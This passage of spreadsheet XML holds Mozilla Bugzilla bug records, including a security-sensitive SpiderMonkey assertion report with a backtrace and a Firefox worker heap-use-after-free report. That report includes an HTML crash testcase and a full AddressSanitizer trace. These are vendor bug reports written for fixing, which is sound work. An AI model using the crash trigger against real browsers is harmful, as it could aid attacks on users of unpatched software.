        <is>
          <t>119 Branch</t>
        </is>
      </c>
      <c r="T1394" t="n">
        <v>1</v>
      </c>
      <c r="U1394" t="n">
        <v>0</v>
      </c>
      <c r="V1394" t="n">
        <v>31</v>
      </c>
      <c r="W1394" t="inlineStr">
        <is>
          <t>Steps to reproduce:
On git commit 3279ccb472284368de49190d73acb13926a757ec I observed an assertion violation in the js-shell. Unfortunately, reproduction this assertion is a bit convoluted.
The 6 input files are provided via the reprl/fuzzing interface, hence the attached python script instead of a simple js file.
Furthermore, reproduction works in 10% of trials only. The script's `SPIDERMONKEY` must be adapted to point to the js-shell.
Precautiously marking as s-s.
I uploaded a pernosco session here but the source seems to missing, not sure what I did wrong there.
https://pernos.co/debug/5z_QVrXs3ZkRL1NaiXTQfg/index.html
```
#0  js::jit::AttachBaselineCacheIRStub (cx=cx@entry=0x7ffff662e100, writer=..., kind=&lt;optimized out&gt;,
    outerScript=0x382c863a1330, icScript=icScript@entry=0x7ffff549e400, stub=stub@entry=0x7ffff549ea70, 
    name=0x555555a30c8a "GetProp.TypedElement")
    at js/src/jit/BaselineCacheIRCompiler.cpp:2602
#1  0x0000555557cdd497 in js::jit::TryAttachStub&lt;js::jit::GetPropIRGenerator, js::jit::CacheKind, JS::Handle&lt;JS::Value&gt;&amp;, JS::Handle&lt;JS::Value&gt;&amp;&gt; (name=0x5555559d70d6 "GetElem", cx=cx@entry=0x7ffff662e100, frame=&lt;optimized out&gt;, 
    stub=stub@entry=0x7ffff549ea70, args=..., args=..., args=...)
    at js/src/jit/BaselineIC.cpp:497
#2  0x0000555557cdca6b in js::jit::DoGetElemFallback (cx=0x7ffff662e100, frame=0x7fffffffbea0, 
    stub=0x7ffff549ea70, lhs=..., rhs=..., res=...) at js/src/jit/BaselineIC.cpp:708
#3  0x000035c7531ab627 in ?? ()
#4  0x0000000000000101 in ?? ()
#5  0x00007fffffffbb18 in ?? ()
#6  0x0000000000000000 in ?? ()
```</t>
        </is>
      </c>
      <c r="X1394" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1395">
      <c r="A1395" t="n">
        <v>145113</v>
      </c>
      <c r="B1395" t="inlineStr">
        <is>
          <t>2002-05-16 15:39:36 -0700</t>
        </is>
      </c>
      <c r="C1395" t="inlineStr">
        <is>
          <t>describecomponents.cgi doesn't call quietly_check_login().</t>
        </is>
      </c>
      <c r="D1395" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:30 -0800</t>
        </is>
      </c>
      <c r="E1395" t="n">
        <v>1</v>
      </c>
      <c r="F1395" t="n">
        <v>1</v>
      </c>
      <c r="G1395" t="n">
        <v>4</v>
      </c>
      <c r="H1395" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1395" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1395" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K1395" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L1395" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1395" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1395" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1395" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1395" t="inlineStr">
        <is>
          <t>[BLOCKER WILL FIX]</t>
        </is>
      </c>
      <c r="Q1395" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1395" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1395" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T1395" t="n">
        <v>1</v>
      </c>
      <c r="U1395" t="n">
        <v>0</v>
      </c>
      <c r="V1395" t="n">
        <v>5</v>
      </c>
      <c r="W1395" t="inlineStr">
        <is>
          <t>... and so the footer is the same as a logged out footer.
Gerv</t>
        </is>
      </c>
      <c r="X1395" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1396">
      <c r="A1396" t="n">
        <v>1787633</v>
      </c>
      <c r="B1396" t="inlineStr">
        <is>
          <t>2022-08-27 22:12:18 -0700</t>
        </is>
      </c>
      <c r="C1396" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsComponentManagerImpl::GetServiceLocked() /  MOZ_CRASH(nsTextToSubURI not thread-safe)</t>
        </is>
      </c>
      <c r="D1396" t="inlineStr">
        <is>
          <t>2024-05-30 10:59:56 -0700</t>
        </is>
      </c>
      <c r="E1396" t="n">
        <v>1</v>
      </c>
      <c r="F1396" t="n">
        <v>1</v>
      </c>
      <c r="G1396" t="n">
        <v>3</v>
      </c>
      <c r="H1396" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1396" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1396" t="inlineStr">
        <is>
          <t>DOM: Workers</t>
        </is>
      </c>
      <c r="K1396" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1396" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1396" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1396" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1396" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1396" t="inlineStr">
        <is>
          <t>[adv-main105+][adv-esr102.3+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q1396" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1396" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S1396" t="inlineStr">
        <is>
          <t>106 Branch</t>
        </is>
      </c>
      <c r="T1396" t="n">
        <v>1</v>
      </c>
      <c r="U1396" t="n">
        <v>0</v>
      </c>
      <c r="V1396" t="n">
        <v>17</v>
      </c>
      <c r="W1396" t="inlineStr">
        <is>
          <t>Given `new Worker(scriptURL)`, the parsing of the `scriptURL` string into an internal `nsIURI` object already takes place in a newly created worker thread, thus has to be thread-safe. 
However there's a special case when parsing `javascript:` URI strings with a non-UTF-8 charset parameter. (In case of a top-level worker, that charset is taken from the current document.) In order to parse the URI string correctly, the handler then additionally makes use of the `nsTextToSubURI` service in [`nsJSProtocolHandler::EnsureUTF8Spec()`](https://searchfox.org/mozilla-central/rev/dd21530757e6af04eb8c62c5e5dd415444cc99e1/dom/jsurl/nsJSProtocolHandler.cpp#1107-1114).
This causes the testcase below to crash in a **debug build** with:
```
Hit MOZ_CRASH(nsTextToSubURI not thread-safe) at /builds/worker/checkouts/gecko/xpcom/base/nsISupportsImpl.cpp:43
```
### Testcase
```html
&lt;iframe name="f"&gt;&lt;/iframe&gt;
&lt;script&gt;
let blob = new Blob([], {type: 'text/html;charset=iso-8859-1'});
f.location = URL.createObjectURL(blob);
f.onload = () =&gt; new f.Worker('javascript:foo');
&lt;/script&gt;
```
(Notice the Blob() just serves as a workaround to get a non-UTF-8 document since `&lt;meta charset&gt;` had been deprecated.)
But as **release builds** don't set `MOZ_THREAD_SAFETY_OWNERSHIP_CHECKS_SUPPORTED` to crash right away, the worker threads may race. Just continuously spawning a large number of such workers caused ASAN heap-use-after-free reports fairly quickly on my end, e.g. on  `m-b-20220825185816-asan-opt` (105.0b3, linux64):
```cpp
==3180813==ERROR: AddressSanitizer: heap-use-after-free on address 0x6030000e82a0 at pc 0x7f4653ed31c7 bp 0x7ffc54670610 sp 0x7ffc54670608
READ of size 8 at 0x6030000e82a0 thread T0 (Isolated Web Co)
    #0 0x7f4653ed31c6 in nsComponentManagerImpl::GetServiceLocked(mozilla::Maybe&lt;mozilla::detail::BaseMonitorAutoLock&lt;mozilla::Monitor&gt; &gt;&amp;, (anonymous namespace)::EntryWrapper&amp;, nsID const&amp;, void**) /builds/worker/checkouts/gecko/xpcom/components/nsComponentManager.cpp:927:21
    #1 0x7f4653ed4ac4 in nsComponentManagerImpl::GetServiceByContractID(char const*, nsID const&amp;, void**) /builds/worker/checkouts/gecko/xpcom/components/nsComponentManager.cpp:1164:10
    #2 0x7f4653ed93d2 in CallGetService /builds/worker/checkouts/gecko/xpcom/components/nsComponentManagerUtils.cpp:61:43
    #3 0x7f4653ed93d2 in nsGetServiceByContractIDWithError::operator()(nsID const&amp;, void**) const /builds/worker/checkouts/gecko/xpcom/components/nsComponentManagerUtils.cpp:250:21
    #4 0x7f4653d3a24d in nsCOMPtr_base::assign_from_gs_contractid_with_error(nsGetServiceByContractIDWithError const&amp;, nsID const&amp;) /builds/worker/checkouts/gecko/xpcom/base/nsCOMPtr.cpp:91:7
    #5 0x7f4659910fb3 in nsCOMPtr /builds/worker/workspace/obj-build/dist/include/nsCOMPtr.h:635:5
    #6 0x7f4659910fb3 in nsJSProtocolHandler::EnsureUTF8Spec(nsTString&lt;char&gt; const&amp;, char const*, nsTSubstring&lt;char&gt;&amp;) /builds/worker/checkouts/gecko/dom/jsurl/nsJSProtocolHandler.cpp:1108:7
    #7 0x7f4659911b04 in nsJSProtocolHandler::CreateNewURI(nsTSubstring&lt;char&gt; const&amp;, char const*, nsIURI*, nsIURI**) /builds/worker/checkouts/gecko/dom/jsurl/nsJSProtocolHandler.cpp:1166:10
    #8 0x7f46542635f2 in NS_NewURI(nsIURI**, nsTSubstring&lt;char&gt; const&amp;, char const*, nsIURI*) /builds/worker/checkouts/gecko/netwerk/base/nsNetUtil.cpp:1903:12
    #9 0x7f46542a127e in NS_NewURI(nsIURI**, nsTSubstring&lt;char&gt; const&amp;, mozilla::NotNull&lt;mozilla::Encoding const*&gt;, nsIURI*) /builds/worker/checkouts/gecko/netwerk/base/nsNetUtil.cpp:1723:10
    #10 0x7f46542a19f0 in NS_NewURI(nsIURI**, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::NotNull&lt;mozilla::Encoding const*&gt;, nsIURI*) /builds/worker/checkouts/gecko/netwerk/base/nsNetUtil.cpp:1743:10
    #11 0x7f465b483a04 in mozilla::dom::WorkerPrivate::GetLoadInfo(JSContext*, nsPIDOMWindowInner*, mozilla::dom::WorkerPrivate*, nsTSubstring&lt;char16_t&gt; const&amp;, bool, mozilla::dom::WorkerPrivate::LoadGroupBehavior, mozilla::dom::WorkerKind, mozilla::dom::WorkerLoadInfo*) /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:2950:10
    #12 0x7f465b480bfb in mozilla::dom::WorkerPrivate::Constructor(JSContext*, nsTSubstring&lt;char16_t&gt; const&amp;, bool, mozilla::dom::WorkerKind, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, mozilla::dom::WorkerLoadInfo*, mozilla::ErrorResult&amp;, nsTString&lt;char16_t&gt;) /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:2534:9
    #13 0x7f465b447cdf in mozilla::dom::Worker::Constructor(mozilla::dom::GlobalObject const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::dom::WorkerOptions const&amp;, mozilla::ErrorResult&amp;) /builds/worker/checkouts/gecko/dom/workers/Worker.cpp:43:41
    #14 0x7f4658392d64 in mozilla::dom::Worker_Binding::_constructor(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/obj-build/dom/bindings/WorkerBinding.cpp:1115:52
    #15 0x7f45c9ce1131  (&lt;unknown module&gt;)
0x6030000e82a0 is located 0 bytes inside of 24-byte region [0x6030000e82a0,0x6030000e82b8)
freed by thread T0 (Isolated Web Co) here:
    #0 0x55e1ca4d4ef2 in __interceptor_free /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:52:3
    #1 0x7f465417dc6f in nsTextToSubURI::Release() /builds/worker/checkouts/gecko/intl/uconv/nsTextToSubURI.cpp:20:1
    #2 0x7f465991137d in ~nsCOMPtr_base /builds/worker/workspace/obj-build/dist/include/nsCOMPtr.h:328:7
    #3 0x7f465991137d in nsJSProtocolHandler::EnsureUTF8Spec(nsTString&lt;char&gt; const&amp;, char const*, nsTSubstring&lt;char&gt;&amp;) /builds/worker/checkouts/gecko/dom/jsurl/nsJSProtocolHandler.cpp:1124:1
    #4 0x7f4659911b04 in nsJSProtocolHandler::CreateNewURI(nsTSubstring&lt;char&gt; const&amp;, char const*, nsIURI*, nsIURI**) /builds/worker/checkouts/gecko/dom/jsurl/nsJSProtocolHandler.cpp:1166:10
    #5 0x7f46542635f2 in NS_NewURI(nsIURI**, nsTSubstring&lt;char&gt; const&amp;, char const*, nsIURI*) /builds/worker/checkouts/gecko/netwerk/base/nsNetUtil.cpp:1903:12
    #6 0x7f46542a127e in NS_NewURI(nsIURI**, nsTSubstring&lt;char&gt; const&amp;, mozilla::NotNull&lt;mozilla::Encoding const*&gt;, nsIURI*) /builds/worker/checkouts/gecko/netwerk/base/nsNetUtil.cpp:1723:10
    #7 0x7f46542a19f0 in NS_NewURI(nsIURI**, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::NotNull&lt;mozilla::Encoding const*&gt;, nsIURI*) /builds/worker/checkouts/gecko/netwerk/base/nsNetUtil.cpp:1743:10
    #8 0x7f465b483a04 in mozilla::dom::WorkerPrivate::GetLoadInfo(JSContext*, nsPIDOMWindowInner*, mozilla::dom::WorkerPrivate*, nsTSubstring&lt;char16_t&gt; const&amp;, bool, mozilla::dom::WorkerPrivate::LoadGroupBehavior, mozilla::dom::WorkerKind, mozilla::dom::WorkerLoadInfo*) /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:2950:10
    #9 0x7f465b480bfb in mozilla::dom::WorkerPrivate::Constructor(JSContext*, nsTSubstring&lt;char16_t&gt; const&amp;, bool, mozilla::dom::WorkerKind, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, mozilla::dom::WorkerLoadInfo*, mozilla::ErrorResult&amp;, nsTString&lt;char16_t&gt;) /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:2534:9
    #10 0x7f465b447cdf in mozilla::dom::Worker::Constructor(mozilla::dom::GlobalObject const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::dom::WorkerOptions const&amp;, mozilla::ErrorResult&amp;) /builds/worker/checkouts/gecko/dom/workers/Worker.cpp:43:41
    #11 0x7f4658392d64 in mozilla::dom::Worker_Binding::_constructor(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/obj-build/dom/bindings/WorkerBinding.cpp:1115:52
    #12 0x7f45c9ce1131  (&lt;unknown module&gt;)
    #13 0x7f45c9c1a808  (&lt;unknown module&gt;)
    #14 0x7f45c9c104ed  (&lt;unknown module&gt;)
    #15 0x7f466177ac2a in EnterJit(JSContext*, js::RunState&amp;, unsigned char*) /builds/worker/checkouts/gecko/js/src/jit/Jit.cpp:107:5
    #16 0x7f4661bd45ae in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:417:32
    #17 0x7f4661c006a6 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:575:13
    #18 0x7f4661c0209e in InternalCall /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:610:10
    #19 0x7f4661c0209e in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:642:8
    #20 0x7f46606a4d5f in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/CallAndConstruct.cpp:117:10
    #21 0x7f4658841687 in mozilla::dom::Function::Call(mozilla::dom::BindingCallContext&amp;, JS::Handle&lt;JS::Value&gt;, nsTArray&lt;JS::Value&gt; const&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/obj-build/dom/bindings/FunctionBinding.cpp:50:8
    #22 0x7f4656e1e47c in void mozilla::dom::Function::Call&lt;nsCOMPtr&lt;nsIGlobalObject&gt; &gt;(nsCOMPtr&lt;nsIGlobalObject&gt; const&amp;, nsTArray&lt;JS::Value&gt; const&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) /builds/worker/workspace/obj-build/dist/include/mozilla/dom/FunctionBinding.h:71:12
    #23 0x7f4656e1e082 in mozilla::dom::CallbackTimeoutHandler::Call(char const*) /builds/worker/checkouts/gecko/dom/base/TimeoutHandler.cpp:167:29
    #24 0x7f4656a4a75b in nsGlobalWindowInner::RunTimeoutHandler(mozilla::dom::Timeout*, nsIScriptContext*) /builds/worker/checkouts/gecko/dom/base/nsGlobalWindowInner.cpp:6485:38
    #25 0x7f4656e1a48b in mozilla::dom::TimeoutManager::RunTimeout(mozilla::TimeStamp const&amp;, mozilla::TimeStamp const&amp;, bool) /builds/worker/checkouts/gecko/dom/base/TimeoutManager.cpp:903:44
    #26 0x7f4656e1961a in mozilla::dom::TimeoutExecutor::MaybeExecute() /builds/worker/checkouts/gecko/dom/base/TimeoutExecutor.cpp:179:11
    #27 0x7f4656e1bdf6 in Notify /builds/worker/checkouts/gecko/dom/base/TimeoutExecutor.cpp:246:5
    #28 0x7f4656e1bdf6 in non-virtual thunk to mozilla::dom::TimeoutExecutor::Notify(nsITimer*) /builds/worker/checkouts/gecko/dom/base/TimeoutExecutor.cpp
    #29 0x7f4653f63cae in match&lt;(lambda at /builds/worker/checkouts/gecko/xpcom/threads/nsTimerImpl.cpp:656:7), (lambda at /builds/worker/checkouts/gecko/xpcom/threads/nsTimerImpl.cpp:657:7), (lambda at /builds/worker/checkouts/gecko/xpcom/threads/nsTimerImpl.cpp:658:7), (lambda at /builds/worker/checkouts/gecko/xpcom/threads/nsTimerImpl.cpp:661:7), (lambda at /builds/worker/checkouts/gecko/xpcom/threads/nsTimerImpl.cpp:662:7)&gt; /builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h:857:12
    #30 0x7f4653f63cae in nsTimerImpl::Fire(int) /builds/worker/checkouts/gecko/xpcom/threads/nsTimerImpl.cpp:655:22
    #31 0x7f4653f0bbdf in nsTimerEvent::Run() /builds/worker/checkouts/gecko/xpcom/threads/TimerThread.cpp:365:11
    #32 0x7f4653f3e822 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /builds/worker/checkouts/gecko/xpcom/threads/ThrottledEventQueue.cpp:254:22
    #33 0x7f4653f36b5f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /builds/worker/checkouts/gecko/xpcom/threads/ThrottledEventQueue.cpp:81:15
previously allocated by thread T0 (Isolated Web Co) here:
    #0 0x55e1ca4d519e in malloc /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:69:3
    #1 0x55e1ca519cb5 in moz_xmalloc /builds/worker/checkouts/gecko/memory/mozalloc/mozalloc.cpp:52:15
    #2 0x7f4653e9a54c in operator new /builds/worker/workspace/obj-build/dist/include/mozilla/cxxalloc.h:33:10
    #3 0x7f4653e9a54c in mozilla::xpcom::CreateInstanceImpl(mozilla::xpcom::ModuleID, nsID const&amp;, void**) /builds/worker/workspace/obj-build/xpcom/components/StaticComponents.cpp:10990:37
    #4 0x7f4653ed2cee in CreateInstance /builds/worker/checkouts/gecko/xpcom/components/nsComponentManager.cpp:184:46
    #5 0x7f4653ed2cee in nsComponentManagerImpl::GetServiceLocked(mozilla::Maybe&lt;mozilla::detail::BaseMonitorAutoLock&lt;mozilla::Monitor&gt; &gt;&amp;, (anonymous namespace)::EntryWrapper&amp;, nsID const&amp;, void**) /builds/worker/checkouts/gecko/xpcom/components/nsComponentManager.cpp:975:17
    #6 0x7f4653ed4ac4 in nsComponentManagerImpl::GetServiceByContractID(char const*, nsID const&amp;, void**) /builds/worker/checkouts/gecko/xpcom/components/nsComponentManager.cpp:1164:10
    #7 0x7f4653ed93d2 in CallGetService /builds/worker/checkouts/gecko/xpcom/components/nsComponentManagerUtils.cpp:61:43
    #8 0x7f4653ed93d2 in nsGetServiceByContractIDWithError::operator()(nsID const&amp;, void**) const /builds/worker/checkouts/gecko/xpcom/components/nsComponentManagerUtils.cpp:250:21
    #9 0x7f4653d3a24d in nsCOMPtr_base::assign_from_gs_contractid_with_error(nsGetServiceByContractIDWithError const&amp;, nsID const&amp;) /builds/worker/checkouts/gecko/xpcom/base/nsCOMPtr.cpp:91:7
    #10 0x7f4659910fb3 in nsCOMPtr /builds/worker/workspace/obj-build/dist/include/nsCOMPtr.h:635:5
    #11 0x7f4659910fb3 in nsJSProtocolHandler::EnsureUTF8Spec(nsTString&lt;char&gt; const&amp;, char const*, nsTSubstring&lt;char&gt;&amp;) /builds/worker/checkouts/gecko/dom/jsurl/nsJSProtocolHandler.cpp:1108:7
    #12 0x7f4659911b04 in nsJSProtocolHandler::CreateNewURI(nsTSubstring&lt;char&gt; const&amp;, char const*, nsIURI*, nsIURI**) /builds/worker/checkouts/gecko/dom/jsurl/nsJSProtocolHandler.cpp:1166:10
    #13 0x7f46542635f2 in NS_NewURI(nsIURI**, nsTSubstring&lt;char&gt; const&amp;, char const*, nsIURI*) /builds/worker/checkouts/gecko/netwerk/base/nsNetUtil.cpp:1903:12
    #14 0x7f46542a127e in NS_NewURI(nsIURI**, nsTSubstring&lt;char&gt; const&amp;, mozilla::NotNull&lt;mozilla::Encoding const*&gt;, nsIURI*) /builds/worker/checkouts/gecko/netwerk/base/nsNetUtil.cpp:1723:10
    #15 0x7f46542a19f0 in NS_NewURI(nsIURI**, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::NotNull&lt;mozilla::Encoding const*&gt;, nsIURI*) /builds/worker/checkouts/gecko/netwerk/base/nsNetUtil.cpp:1743:10
    #16 0x7f465b483a04 in mozilla::dom::WorkerPrivate::GetLoadInfo(JSContext*, nsPIDOMWindowInner*, mozilla::dom::WorkerPrivate*, nsTSubstring&lt;char16_t&gt; const&amp;, bool, mozilla::dom::WorkerPrivate::LoadGroupBehavior, mozilla::dom::WorkerKind, mozilla::dom::WorkerLoadInfo*) /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:2950:10
    #17 0x7f465b480bfb in mozilla::dom::WorkerPrivate::Constructor(JSContext*, nsTSubstring&lt;char16_t&gt; const&amp;, bool, mozilla::dom::WorkerKind, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, mozilla::dom::WorkerLoadInfo*, mozilla::ErrorResult&amp;, nsTString&lt;char16_t&gt;) /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:2534:9
    #18 0x7f465b447cdf in mozilla::dom::Worker::Constructor(mozilla::dom::GlobalObject const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::dom::WorkerOptions const&amp;, mozilla::ErrorResult&amp;) /builds/worker/checkouts/gecko/dom/workers/Worker.cpp:43:41
    #19 0x7f4658392d64 in mozilla::dom::Worker_Binding::_constructor(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/obj-build/dom/bindings/WorkerBinding.cpp:1115:52
    #20 0x7f4661c02cdc in CallJSNative /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:455:13
    #21 0x7f4661c02cdc in CallJSNativeConstructor /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:471:8
    #22 0x7f4661c02cdc in InternalConstruct(JSContext*, js::AnyConstructArgs const&amp;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:690:10
    #23 0x7f4661beef81 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3356:16
    #24 0x7f4661bd45de in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:427:13
    #25 0x7f4661c006a6 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:575:13
    #26 0x7f4661c0209e in InternalCall /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:610:10
    #27 0x7f4661c0209e in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:642:8
    #28 0x7f46606a4d5f in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/CallAndConstruct.cpp:117:10
    #29 0x7f46587411a9 in mozilla::dom::EventListener::HandleEvent(mozilla::dom::BindingCallContext&amp;, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/obj-build/dom/bindings/EventListenerBinding.cpp:62:8
    #30 0x7f465947d574 in void mozilla::dom::EventListener::HandleEvent&lt;mozilla::dom::EventTarget*&gt;(mozilla::dom::EventTarget* const&amp;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) /builds/worker/workspace/obj-build/dist/include/mozilla/dom/EventListenerBinding.h:65:12
    #31 0x7f465947d030 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/checkouts/gecko/dom/events/EventListenerManager.cpp:1310:43
    #32 0x7f465947e5eb in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/checkouts/gecko/dom/events/EventListenerManager.cpp:1506:17
    #33 0x7f465946c79e in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&amp;, mozilla::ELMCreationDetector&amp;) /builds/worker/checkouts/gecko/dom/events/EventDispatcher.cpp:348:17
    #34 0x7f465946b001 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/checkouts/gecko/dom/events/EventDispatcher.cpp:550:16
    #35 0x7f465946f1d0 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/checkouts/gecko/dom/events/EventDispatcher.cpp:1119:11
    #36 0x7f4659474b41 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsPresContext*, nsEventStatus*) /builds/worker/checkouts/gecko/dom/events/EventDispatcher.cpp
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/checkouts/gecko/xpcom/components/nsComponentManager.cpp:927:21 in nsComponentManagerImpl::GetServiceLocked(mozilla::Maybe&lt;mozilla::detail::BaseMonitorAutoLock&lt;mozilla::Monitor&gt; &gt;&amp;, (anonymous namespace)::EntryWrapper&amp;, nsID const&amp;, void**)
Shadow bytes around the buggy address:
  0x0c0680015000: 00 00 00 00 fa fa fd fd fd fd fa fa fd fd fd fd
  0x0c0680015010: fa fa fd fd fd fd fa fa 00 00 00 fa fa fa 00 00
  0x0c0680015020: 00 00 fa fa fd fd fd fa fa fa fd fd fd fa fa fa
  0x0c0680015030: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 06
  0x0c0680015040: fa fa 00 00 00 07 fa fa 00 00 00 00 fa fa fd fd
=&gt;0x0c0680015050: fd fd fa fa[fd]fd fd fa fa fa 00 00 00 fa fa fa
  0x0c0680015060: fd fd fd fd fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0680015070: fa fa fd fd fd fd fa fa 00 00 00 00 fa fa 00 00
  0x0c0680015080: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa
  0x0c0680015090: fa fa fa fa fa fa 00 00 00 00 fa fa 00 00 00 00
  0x0c06800150a0: fa fa 00 00 00 00 fa fa fd fd fd fd fa fa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3180813==ABORTING
```</t>
        </is>
      </c>
      <c r="X1396" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1397">
      <c r="A1397" t="n">
        <v>778765</v>
      </c>
      <c r="B1397" t="inlineStr">
        <is>
          <t>2012-07-30 09:37:15 -0700</t>
        </is>
      </c>
      <c r="C1397" t="inlineStr">
        <is>
          <t>crash at [@ libc-2.15.so@0x36445 ] at MapsGL with webgl.msaa-level = 1</t>
        </is>
      </c>
      <c r="D1397" t="inlineStr">
        <is>
          <t>2012-10-21 22:16:37 -0700</t>
        </is>
      </c>
      <c r="E1397" t="n">
        <v>1</v>
      </c>
      <c r="F1397" t="n">
        <v>1</v>
      </c>
      <c r="G1397" t="n">
        <v>3</v>
      </c>
      <c r="H1397" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1397" t="inlineStr">
        <is>
